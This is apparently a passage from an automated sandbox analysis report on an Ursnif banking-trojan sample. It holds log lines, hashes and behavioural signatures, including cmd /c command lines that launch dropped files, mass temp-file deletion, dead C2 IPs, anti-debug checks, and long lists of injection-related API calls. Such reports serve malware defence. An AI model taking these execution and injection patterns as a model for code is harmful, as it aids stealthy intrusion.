2020-03-24 09:50:27,246 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:50:27,246 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860279e+00.
2020-03-24 09:50:27,263 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF900000.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:50:27,263 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:50:27,279 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF57F0000.
2020-03-24 09:50:27,279 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF5580000.
2020-03-24 09:50:27,293 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF4220000.
2020-03-24 09:50:27,293 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF3690000.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2936.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2548.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2216.
2020-03-24 09:50:27,293 [lib.api.process] INFO: Termination confirmed for process 1632
2020-03-24 09:50:27,309 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1632
2020-03-24 09:50:27,309 [root] INFO: Terminate event set for process 1632.
2020-03-24 09:50:27,309 [root] INFO: Terminating process 1632 before shutdown.
2020-03-24 09:50:27,309 [root] INFO: Waiting for process 1632 to exit.
2020-03-24 09:50:27,325 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_182481664036361324232020
2020-03-24 09:50:28,311 [root] INFO: Shutting down package.
2020-03-24 09:50:28,311 [root] INFO: Stopping auxiliary modules.
2020-03-24 09:50:28,311 [root] INFO: Finishing auxiliary modules.
2020-03-24 09:50:28,311 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:50:28,311 [root] WARNING: File at path "C:\aWpAMaeYY\debugger" does not exist, skip.
2020-03-24 09:50:28,321 [root] INFO: Analysis completed.

MalScore

10.0

Ursnif

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 09:47:00 2020-03-24 09:50:55

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 trigged the Yara rule 'embedded_win_api'
Hit: PID 420 trigged the Yara rule 'vmdetect'
Hit: PID 1632 trigged the Yara rule 'Ursnif'
Possible date expiration check, exits too soon after checking local time
process: LjejZswGjULF7Ng.exe, PID 420
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab658A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar658B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab767D.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar767E.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA01A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA01B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA20F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA210.tmp
Attempts to connect to a dead IP:Port (5 unique times)
IP: 152.195.11.6:80 (United States)
IP: 23.202.161.73:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
